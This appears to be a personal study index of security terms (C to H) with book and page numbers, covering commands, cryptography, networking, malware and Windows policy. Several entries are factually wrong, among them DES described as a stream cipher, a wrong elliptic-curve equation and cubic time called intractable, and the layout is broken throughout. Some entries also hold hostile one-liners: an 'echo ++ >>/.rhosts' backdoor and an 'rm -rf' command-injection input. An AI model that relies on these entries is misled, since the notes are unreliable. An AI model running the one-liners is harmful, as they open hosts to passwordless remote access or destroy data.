chgrp                                                     6   44    change file or dir group --> chgrp groupname file|dir
                                                                    provides an overview of what services are started & what started @ each run level, chkconfig --list, chkconfig --level
chkconfig command                                         6   94
                                                                    <#> <servicename> <on|off>
CHKDSK.exe                                                5   89    used to check file system consistancy after poweoff
                                                                    free malware scanning tool for the various unix (act as a warning system for well known malware but doesn't give
chkrootkit                                                6   184   much details, it doesn't offer u any removal capability if the system is infected), if u will use it frequently in a Cron
                                                                    schedule as an example, it's better to run it in "quiet mode" (chkroot -q) to show only potential problems.
chkrootkit                                                6   184   looks for rootkits, sniffers, deleted logs, trojans, kernel modules
chkrootkit command                                        6   184   for first time it will tell u what it's checking for and what it's found and not found
chkrootkit -q                                             6   184   work in quiet mode where only show potential problems
chkrootkit -x                                             6   185   telling u what it found in expert mode
CHML.exe                                                  5   117   can check,modify your mic label == tool to restrict read and excute access by lower process
chmod                                                     6    37
chosen ciphertext attack                                  4   74    cryptanalyst knows: ciphertext + plaintext, this attack is mainly used against asymetric key ( public-key ) cipher
chosen key attack                                         4   74    cryptanalyst knows: specific relationship betwwen the keys only
Chosen Plaintext attacks                                  4   73    cryptanalyst knows: 1 chosen plaintext + 1 ciphertext,
chown                                                     6   44    change file or dir ownership --> chown username file|dir , chown user:group file|dir
CIDR (Classless Inter-Domain Routing)                     1    60   uses VLSM (variable length subnetmask) to allocate Ips to subnets according to individual needs
CIFS (common internet file system)                        5   101   like SMB with enhancement,NetBios is not necessary with it
CIH Virus                                                 2    37   destruct data, activate every 26April overworte data on HD
cipher.exe                                                5   126   cmd to encrypt and decrypt
cipher.exe /R :<filepath>                                 5   129   to create a recovery certficate to that path
cipher.exe /R :<filepath>/smartcard                       5   129   on vista and later arecovery certficate on smart card,filepath for .cer
cipher.exe /w                                    5    132      to wipe files from hard disk,file scruper,remove plain text remains
cipher/combination locks                         1    240      mechanical locks accept one vaild sequence,electronic locks can be programmed with multiple keys
cipher/combination locks                         1    240      rekeying must be performed for all user if any one user is to be removed from authorized list
Ciphertext                                       4     6       is a message in its encrypted form.
Ciphertext only attacks                          4     74      cryptanalyst knows: ciphertext only , no plaintext, the goal: recover one plaintext or key
CIS (Center For Internet Security )              5    148      security templates and configuration guides and assesment tools to go with them
CIS benchmark report                             6    188      final score not absolute no., but it's compared to other CIS benchmark scored system
CIS hardening guide                              6    187      CIS comes up with the steps they think should be followed in securing that platform
CIS scoring tool                                 5    148       used test OS against security tem benchmark
Civil law                                        2    177
                                                               provide what is closer to antivirus packages in windows, they update signature db daily, current release have
clamav                                           6    186
                                                               signatures for potentially unwanted app (but it's not enabled by default)
                                                               "yum install clamav", it will automatically install the clamav-db package as well and this package contains the initial
clamav installation                              6    186
                                                               signature db, which will be updates nightly
clamav-db                                        6    186      installed automatically with clamav and contains the initial signature db
clamscan --detect-pua                            6    186      to enable "Detect Possibly Unwanted Applications", it's not enabled by Default.
clamscan -r dir                                  6    186      to actually scan files
clamscan --remove                                6    186      remove known malware
class A,B,C                                      1     58      A 1-127,B 128-191 ,c 192-223
Classic-local uesrs authinticate as themselves   5    174
clear                                            6    213      clear the screen from all outputs
clear text protocol                              4     81      telnet,rlogin,rsh,rexec
Client side programming                          2    238      enhance usr interface,req(javascript,activex,java,flash)
CLOSED                                           3     58      no connection between two hosts
cmdlet                                           5    290      tool run within powershell,support pipeing
code number inside chevrons                      5    203      the code numbers can be looked up in the following table to reveal what services are running
                                                               IIS host header can block it if configured,require .ida mapping on win2000 ,, IIS not process the request of script
Code Red Worm                                    5   239,241
                                                               kiddy who only use ip add. , port to connect to server as they connect wrong host header like code red worm
Code signing                                     2    239      use digital signature to assure usr that code come from known source
Cold boot attack                                 4    130      dumping the data from the memory and use it to work around disk encryption to be able to read the data
cold boot attack                                 5    137      passwords can be extracted from RAM through dump raw memory
COM/Script Program Infector                      2     23      Prepending at start of the program,Appending at End, Overwriting a portion of file
command injection                                2    258      command on the input form ex kh;rm -rf
commands to find a compromised system            6     63      ps , netstat , dd
Common law                                       2    176
common services                                  6     95      file sharing (nfs,samba), naming (dns, nis/nis+), rpc (portmapper), internet (web,email)
competitive intelligence                         4    254      collecting open source information on a corporation
competitive intelligence ethics        4   255
computer configuration / GPO           5   153     even when no one log on
comutational complexity                4    51     of a crypto algorithm
Conficker worm                         2    32     vuln in MS server,Brute force passwords,infect removable devices with autorun script
Confientiality                         4    12
Confientiality in Transit              4    84
configuration management               2    34
configuration naming context           5    39     define all the sites,subnets and inter-site replication links
conservative approach(‫)المحافظ‬         2    56     more security benfits,but more cost and sec staff
constant time                          4    51     O(1)
Contingency planning(‫)طوارئ‬            2    82     BCP & DRP
contraband checks                      1   242     deterent controls and detective,x-ray scanner,metal detector,bag inspection
Cookies                                2   231     keep track of usr state,created by web srver and stored in web browser
Copyright                              2    79     Intellectual Property:
cost benefit analysis                  3   285     comaprison between he cost of implementing counter measures with the value of reduced risk
cost of countermeasure                 3   285     intial cost+labor cost+life cycle cost
Covered writing                        4    34
cp <filename> <destenation>            6   217     copy file from one location to another.
CPS - Certificate practice statement   4   117
Cracking                               2   119     offiline process to guess password given password file info
Cracking Motivation                    2   124     attacker,admin:recover forgoten pass,Audit,check filter effective,aid user migrating
Cracking RedHat pass file              2   126     can decrypt MD5+salts
creator owner group                    5    93     permissions applied to the owners,automatically granted to owner
Criminal law                           2   177
CRL (Certificate Revocation List)      5   178
                                                   schedule daemon(crond), start an action(in the background)at present time, /etc/crontab --> crontab file in user
cron                                   6    79
                                                   home dir(for users)
                                                   created manually,tansitive,two way or one way trust == Cross forest trust-all server2003,no reblication,transit 1 or 2
                                                   way == Forest-inside one forest all domains trust eachother by default == Forest-cross forest trust must be created
cross forest turst                     5   42,43   manually == Forest-cross forest trust is transitive so all domains in 2for trust == Oneway cross forest trust-one side
                                                   trust the other side == No cross forest replication in cross forest trust == Forest-inter domain replication in the same
                                                   forest
cross over                             1    24     the primery use of it to connect external router to firewall,+tx to +rx and -tx to -rx
cross site scripting                   2   265     poor input validation,include javascript,inline frames,steal cookie,affect HTTPS,HTTP
Cross Site Scripting                   5   187
cross site scripting defense           2   267     avoid reflecting user i/p back to web site,filter,validate,Translat&encode
Crossover Error                        2   145     FAR and FRR are equal
Cryptanalysts                          4    6      who deicate their live to breaking ciphers
cryptanalytic                          2   133     time memory trad off made by philippe
Crypto vs. Stego                                  4   35    crypto provides confidentiality but NOT a secrecy
                                                            by: 1- Keeping plain test secret or delete in if not needed, 2- prevent mechanisms that allow the attacker to
crypto attacks- how can be guarded                4   74
                                                            encrypt random msgs using ur secret key.
Cryptographer                                     4   6     who created encryption algorithm
Cryptography                                      4   6     means hidden writing
Cryptography - Detection                          4   36
cryptography Applying the to network              4   80
Cryptology                                        4   6     generic form of the study of both cryptography and cryptanalysis
cryptosystem                                      4   50    main golas: confidentiality,integrity of data , authentication , and non-repudiation . There NO availability
cryptosystems types                               4   26    3 general types: Secret Key(symmetric), Public Key (asymmetric), Hash (one-way transformation)
CS(code Segment)                                  2    24
csdiff.exe                                        5   315   free third party tool to comapre files
CSMA/CD                                           1    11
CSS - (Contents Scrambling System )               4    8    encrypt data on dvd
cubic time                                        4   51    O(n^3)
cubic-time algorithm                              4   51    an example of intractable problems. And could take thousands of years to be solved.
cumulative hotfixes                               5    57   fix many issues at once
                                                            make windows linux smart or ( linux aware ) and allow some unix software to run directly in windows( all versions
cygwin                                            6   7,8
                                                            except CE) and you must have access to the source code ( can compile server software)
                                                            give u nice but small selection of linux shells and command and you can add more programs later ( by running
cygwin base install                               6   9
                                                            setup.exe)
                                                            as dig ( domain name specific) that is better than nslookup, also can use gnu development tool to write linux and
cygwin commands                                   6   11
                                                            windows code, also we can use it as X server
cygwin functionality                              6   11    install linux lib.and prog it needs in cygwin to communicate with service on native linux server)
cygwin isn't linux                                6   8     have some linux commands and utilities and it isn't linux emulator for windows so it is "half-way" step to linux

cygwin power                                      6   10    adding powerfull scripting to windows (there are something windows can't do it easily or can't do it at all)
cygwin setup.exe                                  6   8
                                                            it can be entire environment of development tool that have a lot of power ( as develop software for GNU project)
cygwin uses                                       6   8
                                                            and alow windows developers to do some neat advanced programming in windows
DAC (Discretionary Access control)                2   109   optional,usr can manag it ex usr name&pass,user can give pass to another without admin perm,
DACL list of permissions on file or folder NTFS   5    90   DACL always enforces & no matter from where file access
Data base Hardining                               2   221   update,patch,isolate,restrict access not add or drop tables by usr
Data classification                               2   104   top secret,secret,confidential,SBU,nuclassified
Data Custodian(‫)حضانه‬                             2   103   the admin resp for managing access
data encryption and access control                5    18   for windowes mobile,checkpoint,Credant,SafeBoot,Trust digitall
Data excution preventation                        5    7    prevent excution of code in areas of memory that aren't intended to hold excutable data
data normalization                                3   183   ids take the data to baseline before analysis
data over cable interface specification(DOCSIS)   1    18   ITU,cable television comapanies provide internet access over exisiting tv cables.
Data Owner                                        2   103   the creator of the data,or who has the authority of data like C-level
David Kahn                                        4    7
dcredit=$                                         6   60    minimum no of digits is $ in/etc/pam.d/system_auth in pam_cracklib argument
dd                                                6   68    backup command dd if=<Input-file> of=<output-file> , and it is offer no security prevention
dd                                                6   68    backup (bit-by-bit image), reduce backup time, can be conducted through: Locally, Via Scripts, Over the Network
dd for windows                                    5    75   create image files,can search image,can be burned to cd/dvd
DDOS                                              3    29   attacker recuit zombie tools TFN,Trinoo,stacheldracht,tfn2k
Deadhat virus                                     2    41   compromise myDoom infected machine ,remove Mydoom and terminate antivirus
debug programes-used in DLL injection &cain       5   125
decoding IP header                                1   152
decoding packets                                  1   150   five tips for decoding packets
decoding TCP header                               1   160
decoy account                                     5   176
Decryption                                        4    6    is the process transforming encrypted message back into its original plaintext or cleartext.
DeCSS                                             4    9    Decrypt data on dvd
dedicated lines                                   1    17   T1,T3,E1 allowing n sites to connect will need n+1 links
deep inspection                                   3   181   header and data,slow,anomaly analysis,protocol analysis
Defacement monitoring                             2   270   alrts when unauthorized changes to parts of web application, uses file integrity checker
default domain policy GPO                         5   159   applied to every one at the top level of domain
default domain policy GPO                         5   160   updated to other domains in 15 minutes and workstations update in 90-120 min
Delegation authority -AD                          5   114
Deny=$                                            6   62    in /etc/pam.d/system-auth in pam_tally module and it equal the number made before account lock
DEP                                               5    7    Data excution Preventation
dependencies service                              5   194
DES - Data Encryption Standard                    4   57    2^56 key size, 64-bit (8-bit for parity & 56 key) block cipher. Fast, uses (16 rounds)
DES - Data Encryption System                      4   22    it's a very common stream cipher, it uses 64-bit block and 56-bit key.
                                                            it has 4 operations mode like any block cipher: ECB - (Electronic Codebook mode), CBC - (Cipher Block Chaining
DES - four operation modes                        4   57
                                                            mode), CFB - (Cipher feedback mode), OFB - (Output feedback mode)
                                                            DES algorithm is not group, this means that multiple DES ecryption are not equivalent to single encryption, so
DES advantage                                     4   59
                                                            Multiple encryption will increase the security.
DES is not group                                  4    59   this means that multiple DES ecryption are not equivalent to single encryption. THIS ID GOOD THING
DES weakness                                      4    58   not secure due to its key size, and not because the algorithm has been broken
DES-Meet In the Middle attack                     4    60   only twice the work of brute-forcing DES . Attacker has the cleartext and ciphertext
destructive plan - OPSEC                          4   246   should e implemented to avoid aggregation of information that is no longer useful or not in use.
DFS (Distributed file system)                     5    10   enhanced in 2003 R2,allow user to access shared files
Dial-in Authentications                            2   114   TACACS,RADIUS
DIAMETER                                           2   113   TCP based replacment of RADIUS
Dictionary attack                                  2   123   fastest method ,countermeasure(policy: writtenrules,filter: technical mechanism)
DID                                                2   6
DID - Approaches to did                            2   14    Uniform protection,protected enclaves,Information Centric,Threat vector analysis
Diffie-Hellman Key Exchange                        4    30   Diffie-Hellman is used only for key exchange.
difok=$                                            6    61   no of character must be diff from old passwd in/etc/pam.d/system-auth in pam_cracklib argument
Digest mode Authentication                         2   248   use one way MD5 , data sent in HTTP header
Digital certificate                                4   123   X.509 certificate
Digital Substitution [Decryption]                  4    16
Digital Substitution [encryption]                  4    14
Direct access                                      5    12   win7,win2003R2,allow remote users to access enterprise without worring about VPN
Direct Evidence                                    2   187   what handler actuallt saw
directed broadcast address                         1    62   pass by router
Directory traverse attack                          2   251
diruse.exe                                         5   325   can monitor folder if exceed will alert
diruse.exe /s                                      5   313   show directory and all subfolders
                                                             a^x mod n = b , mod(means remainder), very difficult to be solved, used by: EL-Gamal, Diffie-Hellman, Schnorr
discrete algorithm problem - Intractable problem   4   54
                                                             signature scheme, digital Signature Algorithm (DSA)
Disk encryption                                    4   130   another use of PKI is to create certificates to be used for disk encryption
DLCI (data link control identifier)                1    65   10 bit layer2 address , frame relay
DLL (Dynamic linked library)                       2   239
DLL injection                                      2   130   Cain process to extract pass hashes
DLL Injection Attack                               5   125   require debug programs right,insert thread into address space of target process
DMCA                                               2    80   digital millenium Copyright Act
DN - Distinguish Name                              4   120   person or entity who wants the certificate providing their identification in the form of DN.
DNs                                                1    74   domain name system,
DNS - authoriative dns server                      1    74   responsible for a domain and have a list of sub domains
DNS - recursive query                              1    76   client ask server to do all dns lookup for them and send the final reply to client
DNS - split dns                                    1    78   people receive ip answers differently if they are inside or outside.
DNS - top level domains                            1    73   generic and country code +
                                                             when user need to lock up for FQDN, the system request the info from predefined DNS server, DNS save cache
DNS basic                                          6   100
                                                             normally for 24hrs.
dns cache poisioning                               1   77    poisioning a dns cache so clients directed to wrong places
dns denial of service                              1   77    flooding dns server with queries
dns footprinting                                   1   78    use zonetranfer and reverse lookups to learn about nwtwork,solution =limit zone tranfer,split dns
DNS query                                          1   75    local dns server >> root dns server >> top level dns server
dns query type                                     1   75    GetHostByname-GetHostByAddr
                                                                   for well known sites higher TTL value to avoid overloading,for sites changing a lot lower TTL value because address
Dns TTL                                              1     75
                                                                   change frequently
domain controllers                                   5     32      server to manage active directory database
                                                                   are stored in active directory database and replicated to all domains == domain group policy-at startup/shutdown-pc
domain group policy object                           5    158      download computer conf. == domain group policy-at login/log off-pc download user configuration == 90-120 min
                                                                   for any policy change
domain network in network location types             5    213      used to access domain controllers for computer's active directory, prifile select auto when active directory detected
Double DES                                           4     60      doesn't increase the effective key size significantly, 2^57 key size
downstream liabilty                                  3      53     means to try to protect other by filtering your outgoing traffic
driver rollback                                      5      81     related to system restore
DropMyRights                                         2      36
DROPMYRIGHTS.EXE                                     5     179     tool to run as adminstarto=RUNAS.exe
DRP (disaster recovery plan)                         2      85     Recovery IT System(data center,business (operation,location,processes)),tactical thing
DSA - digital Signature Algorithm (DSA)              4     54      an algorithm that uses the intractable problem of discrete algorithm for finite fields
DSL                                                  1      18     low cost,use exisiting phone lines,high speed
dsniff,ettercap                                      1     135     a tool used to sniff inside a switched network enviroment
dummy camera                                         1     243     preventive control
dumpeventlog.vbs                                     5     329     dump the event log in text file and sort it
dumpEvt                                              5     284     dump event logs into plain text AscII,somarsoft
dumpevt.exe                                          5     328
dumpReg                                              5     284     dump the registry to plain text AscII,somarsoft
Dumpsec                                              5     284     can dump ntfs permissions and audit things to text file,somarsoft
dumpusers.exe                                        5   169,170   create null session,
EAP (Extensible Authentication Protocol)             5     229     for vpn if smartcard required use EAP
                                                                   authentication protocol provides network authentication. EAP used vary according to the clients OS, the back-end
EAP- Extensible Authentication protocol              4    167
                                                                   authentication systems (Windows: Active Directory, LDAP, RADIUS)
EAP over RADIUS                                      4    168      the Authenticator uses EAP-over-RADIUS to pass the supplicant request to the Authentication Server
EAPOL - EAP over LAN                                 4    168      EAP over lan(EAPOL), the supplicant uses EAPOL to communicate with the Authenticator
ECB - (Electronic Codebook mode)                     4     22      Two identical plaintext block will generate the same cipher block, it's susceptible to brute-force attack
                                                                   it can be used to support both encryption/decryption and digital signature, high security even with small key
ECC - Elliptic Curve Cryptosystem                    4     69
                                                                   length (higher strength per bit), high speed implementation, low process power
ECDLP - ECC intractable problem & sol                4     70      Y^3=X^2+aX+b, Pollard rho-method is the best-known solution for ECDLP
ECDSA - Elliptic Curve digital Signature Algorithm   4     55      use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)
echo ++ >>/.rhosts                                   3     16      allow all users to connect remotly without password, "Accept connection from any usr any machine"
                                                                   the last two bits in reserved and the first 2 bits in byte 13 in tcp header ,CWR=Congestion Window
ECN (explicit congestion control )                   1    105
                                                                   Reduced,ECE=ECN echo
EDGAR DB                                      4   257    at the Securities and Exchange Commission, u'll find annual and quarter reports goldmines of information.
Edgar search                                  4   259    will provide documents related to the company
Edit security template                        5   146    using notepad or MMC.exe
EDR - enhanced data rate bluetooth spec.      4   150    improve the rates of Bluetooth upto 2.1 Mbps
EEC - Elliptic Curve Cryptosystems            4    55    provides Higher speed, lower power consumption, and tighter code
EER(Equal error rate)                         2   145    FAR and FRR are equal
EFS (Encrypted file system)                   2   116    MS
                                                         use AES 256bit >encrypt AES key using public of certficate>encrypt the private by password == protect from linux
EFS (Encryption File System )                 5   126
                                                         boot,stolen backups == in NTFS,windows2000or later,USB,removab
EFS (Encryption file system) (version)        5   128    diffferent keys for os
EFS best practice-SYS.EXE tool                5   131    to put passphrase at boot up
EFS recovery certficate                       5   129    PFX file encrypted by password
egress filtering                              3    53    applied to the outbound traffic,very useful as intrusion detection system,virus trying to connect
egress filtering                              3   279    excellent way to detect systems infected with malicious code because they often use spoofed IP address

Elliptic Curve Diffie-Hellman                 4    55    use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)

Elliptic Curve EL-Gamal                       4    55    use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)

Elliptic Curve Schnorr signature scheme       4    55    use Difficulty of solving the discrete logarithm problem as applied to Elliptic Curve (intractable problem)
E-mail - decrypting                           4   111
E-mail - encrypting                           4   109
E-mail - sign confirming                      4   113
E-mail - signing                              4   112
Emeregncy recovery - Bit Locker               5   140
employee issuse - OPSEC                       4   239
employment agreement                          4   241    Non-Competition, Non - Solicitation, Non Disclosure Agreement (NDA), Intellectual property
ENC - (Digital Substitution) [encryption]     4    14    it's a digital substitution NOT encryption
Encoding                                      4   none   the difference between encoding & encryption that the key in encoding is well-known but in encryption is secret.
Encryption                                    4    6     coding a message in such a way that meanings is concealed
encryption Applying to application layer      4    81    APOP , AFS ,Secure shell,APOP protect authenication message no the E-mail message it-self
encryption Applying to network layer          4    82    VPN
                                                         TLS protocol is to provide privacy and data integrity between two applications,it's comproise of two protocol
encryption Applying to transport layer(TLS)   4    81
                                                         recored and handcheck
encryption file system best practise          5   131    strong password,smart card,syskey,encrypt folders not files
encryption file system win2000                5   130    the private key is in the profiles of local admin
endian                                            3    32     which part of a byte is considered most significant,big endian left,little endian right
Enrollment                                        2   145     the Process by which Biometic initially recorded
Equal error rate                                  2   145     FAR and FRR are equal
escort from restricted area                       1   237     employee escort:disable all his access,take badge,parking decal,escorted by guard or at least two managers
ESTABLISHED                                       3    58     third step in three way handshack
                                                              bring sniffing and packet analysis to a new level,first GUI( need to run X window) --> wireshark & or from application
ethereal wireshark                                6   193
                                                              menu then internet then network analyzer
Ethernet                                          1    11     only single node should transimit fram at atime
Ethernet                                          1    11     Baseband,shared media,most common layer 2
Ethernet frame                                    1    11     chunk of data transmitted by machines,single machine should transmit 1 frame at a time
Ethertype                                         1    68     the field that endicate higher layer protocol in ethernet frame ,ex. IP =0x0800
ettercap                                          1   137     attacker send false arp replies to associate his mac address to the target host
EUI (extended unique identifier )                 1    83     FFFE is inserted inside the mac to identify ipv6
evacuation practise                               1   219     taking drills seriously,take aaction against who ignore alarms,employees should be trained in cross roles
evacuation Procedures                             1   218
evacuation roles                                  1   220     safety warden,meeting point leader,searcher,stairwell/door monitor,special needs assistance
evacuation route posting                          1   218     signs,multiple copies of evacuation procedure
                                                              observable ocurrence in system or network(system crash,pkt flooding in net,sys boot sequence Authorized logon is
Event                                             2   156
                                                              event some event make incident
event log                                         5    318
Evidence - Admissible                             2    182    reliable,relevant to the case
Evidence integrity                                2    186    make hashing
exchange server 2007                              5    290    graphical management tool wrapper for powershell
exclusive log monitoring                          3    212    alist of keywords or phrases that define event of interest,don't match --- > alert
EXE program infector                              2     24    affects exe only
exec.vbs                                          5     55    excute process on remote machine , without going to pc , excute batch , included in resource kit
Exploration Air                                   2    250    default web page in IIS4 made DOS and increse CPU to 100%
exponential O(2^n)                                4     51    an example of intractable problems.
exponential-time algorithm                        4     51    an example of intractable problems. Could take longer than the universe to be solved.
exposure factor (EF)                              3    269    the percentage of loss a threat event would have on asset, in terms of 0--> 100 % loss to an asset
extended perm                                     6   41,42   setuid,setgid,sticky bit and specified through fourth number in chmod
external mode                                     2    126    can extend custom routines worte in c code
External PKI                                      4    118
Facial thermograms                                2    145    sens the heat in the face aused by flow of blood under the skins
factoring integer problem - Intractable problem   4    53     Difficulty of factoring a large interger into its two prime factors, hard problem solved by trial & error, used by RSA
faillog -u <username>                      6    62     list current no of bad logins with -r with unlock the account, with -m -l will turn off locking on lock out of specific user
faillog -u <username> -m -l                6    62     will turn off locking on the lock out of particular user
faillog -u <username> -r                   6    62     will unlock the account
False Accept Rate                          2   145     the percentage of reading in which the system accepts unauthorized user
False Arrest                               2   181
false negative                             3   171     false ok this is bad,doesn't generate alarm for the analyst,worst case
false positive                             3   171     ids generate alaram for false hacking,burden on admin
False Reject Rate                          2   145     the percentage of legitimate user falsely rejected, system fails to accept a genuine user
FAR (False Accept Rate)                    2   145     the percentage of reading in which the system accepts unauthorized user
fat and fat32                              5    88     no auditing ,no access control ,no fault tolerance
fc.exe /                                   5   315     cmd tool,print difference between files
FDA                                        2   178     regulat the drugs
FDCC                                       5   148     fedral desktop core configuration
fdcenter.org                               4   257     for Private foundations
FDDI (fiber distributed data interface )   1    14     two rings,primary ring,second ring for redundancy,data in the second ring is in the opposite direction
                                                       can be physical ring or physical star but physical ring wouldn't allow bypassing troubled areas(disconnected
FDDI (lack of MAU)                         1    14
                                                       ports,fault cables)
FDDI beacon frame                          1    14     when a system doesn't see a token for a specific time it send beacon .
FDDi validation against self diagnostics   1    14     isolate the system with faulty card that can't diagnostic itself properaly
FDIC                                       2   178
features in server manager                 5   199
                                                       redhat linux,desktop&server (choose by installer),(i386,x86_64,powerpc,alpha,sparc)no amd64,25
fedora                                     6    21
                                                       languages,RPM(for package management using yum), firewall included and enabled by default
fences                                     1   242     deterent controls
FHSS - freq hoping spread spectum          4   150     hop between 79 cifferent channel in 2.4GHz , used @ Bluetooth, provide high degree of interference immunity.
File Infectors                             2     22    attach itself to existing prog (.com,.exe)
file integrity checkers                    3    211    calculate hash,then comapre
file sharing                               6     95    NFS, samba
file system                                6     27    actually location of the information
file system structure                      6   27,28   /bin, /usr/bin , /usr/local, /etc, /dev, /var, /tmp, /home, /mnt, /usr
filtered port                              3    125    might be listening but nmap can't tell for sure
final report                               3    286    interim report+safeguard selection+risk mitigation analysis+cost benefit analysis+recommendation
find </> -name <file_name>                 6    224    to search for files within a file system
Finger                                     3      9    can return information about users on aparticular system,used for reconissence,service port 79Tcp
finger command                             6    125    used to display the UTMP log file.
finger -l @target                          3     20    all information about user,hme dir,shell,mail status
FIN-WAIT1                                  3     58    a host want to terminate the connection
                                                                                                                           ⃝
FIN-WAIT2                                    3    58   both side finished communication
fire types                                   1   223   comustible(paper-wood)typ A Δ - liquids:typ B :□ -electrical:typ C :
firefox add-n-edit cookies                   2   276
firefox tamper data                          2   277
firewall                                     3    48   ccontrol what is allowed across some point in a network as a mechanism to enforce policy
firewall "wfas"keeping blocking /unblock     5   217
firewall and ids                             3    65   using a log to know there is a virus infection inside your network
firewall as an IPS                           3   230   it's a real internet prevention system but it's static.
firewall benefits                            3   50    reduce risk, increse privacy, filter communication, encrypt communication, records(logging), noise filter
firewall bypassing protection                3   110   audit,proxy firewall,IDS,Ips,educate users on social engineering
firewall bypassing techniques                3   103   worm,wireless,modems,tunneling,vpns,social engineering,home laptops
firewall default rule                        3    52   default allow restrictive,default deny:permissive
Firewall fo windows with advanced security   5    12   managable through group policy and NETSH.exe
firewall implementation                      3    48   dedicated applience, hardware or software into network device, software on a computer
firewall plus something                      3   251
firewall rules (chain)                       6   179   FORWORD,INPUT,OUTPUT
firewall's leak                              3    51   the attacks that bypassed the firewall
firewalls objectives                         3    48   reduce risk,increase privacy,enforce security policy
firewalls shortcomings                       3    51   dialup,vpn may bypass,organizaion may only depend on them,attacks on application layer
FISMA                                        5   148
footprint web Authentication                 2   249   cookie,SW or signature,client ip ---ease to brake
forensic toolkit                             5   284   Afind,Hfind,Sfind,Filestat and hunt,file system analysis list of files accessed without modifin
forensic toolkit                             5   284   by foundstone,show hidden files,alternative datastream
Forest & trust                               5    39   one or more AD that replicate portions of database and which all trust each other
Forest & trust - two way transitive trust              two domain trust eachother
Forest & trust _ Inter-domain replication         39
Fork() bomb                                  3    29   DOS attack ,cal fork() to create a new process like the orginal,done repeatly
Form based Authentication                    2   248   use HTML form field to request authen,password sent in clear txt
Form Submission Action                       2   227   GET,POST
foundstone                                   5   284   foresnsics toolkit,Ntlast,Fport,scanline
fport                                        5   284   print table of tcp/udp connections and the excutables attached to them',foundstone
FQDN                                         1    75   full qualified domain name
fragmentation attacks                        1    53   send malicious commands fragmented,send too small fragments,send overlapping fragments
Frame relay                                  1    17   packet switching,less cost
free BSD                                     2   125   emplyee stronger password in hashing
FRR (False Reject Rate)                      2   145   the percentage of legitimate user falsely rejected
FRS (File Replication Service)               5   292   domain controller multi-masters replicate scripts to each other usin it
ftp                                          1   100   file tansfer protocol ,rfc959
ftp - active and passive               1   102   in activer server intiate connection,in assive client intiate connection
ftp - anonymous ftp                    1   100   no predefined username and password,threat to be a warez site,prevent get with authoritive account
ftp - blind ftp                        1   101   security through obscurity,prevent one user from seeing the names of files uploaded by other users
ftp - PORT command                     1   101   can ask the ftp server to intiate the connection to sepcific port and ip address,used to scan network obscurity
ftp command channel/control channel    1   100   user authenticateis and use commands in this channel to start transfering of files,port 21
ftp data channel                       1   100   here's the actual data transfer happen,port 20
                                                 WU-FTP track incoming connections , solaris ,IRIX and others variants typically log only ftp conn. Put logs in syslog
ftp logs                               6   140
                                                 file: ( date time hostname program name : msg sent to syslogd)
ftp logs                               6   140   Notice: only the FTP connection only is logged, not what files were uploaded or downloaded.
FVEK (Full Volume Encryption Key )     5   134   128bit AES or 256 AES,encrypt decrypt the volumes of bitlocker
GenI honeynet                          3    85
Genric.inf new security tamplates      5   146
GET                                    2   228   usr data are appended to the url
getmac.exe                             5   283   retrive the hardware address of remote computers
getty service                          6    74   allow users to begin logging into the system
Gigabit                                1    11   designed for large frames sucestiple of too many small frames
GLBA                                   2   178
                                                 portion of AD that is replicated across domain boundries , is the part of DB replicated bet domains , forest-schema is
global catalog CG                      5   39    all possible types of ojects&their att in domain , forest-configration naming context (sites,subnet,intersite repl link ,
                                                 forest-schema&configrations are replicated& sync in all the forest ,
global catalog server                  5   39    special domain controller which replicate across domain boundries
global group                           5   97    can only contain members from the domain where created == contain users of the same jobs,shared needs
Global vs. local users and groups           33
Goals of Cryptography                  4   12    CIA, Non-repudation
gopher                                 3   123   port 70 tcp
                                                 used to assign a passwd to a group gpasswd group -->add passwd to a group gpasswd -a user group -->add user to
gpasswd                                6   47
                                                 the group gpasswd -d user group --> to delete the user from the group
GPMC Group policy management console   5   160   GPMC ,download for xp/2003 by default in vista /later ,, used to configure domain GPO in forest
GPO administrtive templates            5   166   ***********2 pages***********
                                                 special logon scripts when run can configure almost any thing in computer == Group policy-configure each security
                                                 option in win 2000&later == Group policy-is the most important data replicated bet domains == Group policy-are
GPO Group Policy Objects               5   45    special login scripts when run ,reconfigure anyth == Group policy-run when computer boot & checked every 90 to
                                                 120 == group policy-run user GPO when login&PC ckeck it every 90 min == group policy-in active directory applied
                                                 to sites computers &Ous == Group policy-how to open & edit it in local pc or active directory
GPO local (Group Policy Object )       5   153   mmc snap in,current pc setting except ntfs and regisrty key ACLs,applied automaticaly
GPO password policy                       5   162   max-length:127,minimum password length:15 == password policy&recommended settings(use passphrase)
GPO scripts ( Startup/Shutdown scripts)   5   156   startup/shutdown run in computer context,logon/logoff run in user context
GPO security options recommend            5   165   ***********3 pages***********
GPO settings checklist                    5   161
gradual structural weaking                1   228   a result of a series of lesser events
grep <string> <file>                      6   225   to perform search of data within files.
group policy                              5    44   password policies,account polcies,audit polcies,ntfs,kerberos
group policy management console           5    46
groupadd                                  6    45   create a new group -->groupadd grpname
groupdel                                  6    45   delete a group --> groupdel grpname
                                                    one type of boot loader, add one line at top of the file to make a password to boot loader (password --md5
grub.conf                                 6   85
                                                    <md5hash>)
guest account disabling                   5   173   net user password /active:no /time: ,
guest os                                  1   177   the os installed on a virtual machine
Guideline - Definition                    2    65   suggestion (recommendaion) ,not mandatory, assist
hardened honeypot                         3    75   to differentiate between legitamate traffic and illegal,anyone connects to it is attacker
hardening tools                           6   187   that will make some or all of the recommended changes to make ur platform secure, free tools
Hardware key store                        4   121
Hash Algorithm                            4   32    are effective due to the extremely low probability that two different plaintext have the same hash value

Hash Function                             4   32    one way algorithm, the key length is the Hash length, like: MD2, MD4, MD5, RIPEMD-160, SHA-1, SHA-2
heap memory                               3    32   is used for arbitary large buffers ,resulting pointers are called procedure,hard for buffer overflow
Hearsay evidence                          2   187   3rd party testimony -I heard from some one that
heat sensors                              1   223   like thermometer operate when there is a rise in tempreture
heuristic(‫- )ارشادي‬anti-virus -           2    43   searches on files looking for malicious-looking code routines, don’t dep on signature
hexadicimal                               1   148
HFNETCHK.EXE tool
HIBERFIL.SYS                              5   132
HIDS                                      3    22   distrubtued as software agents that can be monitored from a central location for large enterprise
hids advantage                            3   215   notable encryption , identifies inside attacks agains system, details inside the network not perimeter only
hids challenges                           3   216   ………
hids developments                         3   219   monitor application level, protect web sites, Appliance plateform support(routers, switches), morphing with HIPS
hids recommendations                      3   218   can be used to identify attacks & identify policy viloations
highlighter                               5   316   free comaprisons between files from mandiant
HIPAA                                     2    59
